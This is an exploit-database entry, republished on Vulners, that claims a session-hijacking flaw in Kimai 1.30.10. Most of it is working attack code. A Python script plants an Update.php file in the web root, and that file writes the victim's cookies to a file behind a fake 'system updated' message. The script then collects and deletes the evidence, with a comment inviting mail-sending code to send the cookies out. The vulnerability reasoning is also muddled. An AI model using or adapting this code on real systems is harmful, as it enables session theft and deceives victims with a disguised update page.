Vulners
Lucene search
Kimai-1.30.10 - SameSite Cookie-Vulnerability session hijacking
## Exploit Title: Kimai-1.30.10 - SameSite Cookie-Vulnerability session hijacking
## Author: nu11secur1ty
## Date: 02.23.2023
## Vendor: https://www.kimai.org/
## Software: https://github.com/kimai/kimai/releases/tag/1.30.10
## Reference: https://www.thesslstore.com/blog/the-ultimate-guide-to-session-hijacking-aka-cookie-hijacking/
## Reference: https://portswigger.net/support/using-burp-to-hack-cookies-and-manipulate-sessions
## Description:
The Kimai-1.30.10 is vulnerable to
SameSite-Cookie-Vulnerability-session-hijacking.
The attacker can trick the victim to update or upgrade the system, by
using a very malicious exploit to steal his vulnerable cookie and get
control of his session.
STATUS: HIGH Vulnerability
[+]Exploit:
## WARNING: The EXPLOIT IS FOR ADVANCED USERS!
This is only one example:
```python
#!/usr/bin/python
import os
import webbrowser
import time
webbrowser.open('https://pwnedhost.com/kimai-1.30.10/public/en/login')
input("After you log in please press any key to continue...")
os.system("copy Update.php
C:\\xampp\\htdocs\\pwnedhost\\kimai-1.30.10\\public\\")
time.sleep(3)
webbrowser.open('https://pwnedhost.com/kimai-1.30.10/public/Update.php')
time.sleep(3)
os.system("copy
C:\\xampp\\htdocs\\pwnedhost\\kimai-1.30.10\\public\\PoC.txt
C:\\Users\\venvaropt\\Desktop\\Kimai-1.30.10\\PoC\\")
# Your mail-sending code must be here ;)
time.sleep(7)
os.system("del C:\\xampp\\htdocs\\pwnedhost\\kimai-1.30.10\\public\\PoC.txt")
os.system("del C:\\xampp\\htdocs\\pwnedhost\\kimai-1.30.10\\public\\Update.php")
```
-----------------------------------------
```PHP
<?php
//echo '<pre>';
// print_r( $_COOKIE );
//die();
$fp = fopen('PoC.txt', 'w');
fwrite($fp, print_r($_COOKIE, TRUE));
fclose($fp);
echo "DONE: Now you are already updated! Enjoy your system Kimai
1.30.10 stable (Ayumi)";
?>
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/kimai/2023/Kimai-1.30.10)
## Proof and Exploit:
[href](https://streamable.com/md9fmr)
## Time spend:
03:00:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Apr 2023 00:00Current
7High risk
Vulners AI Score7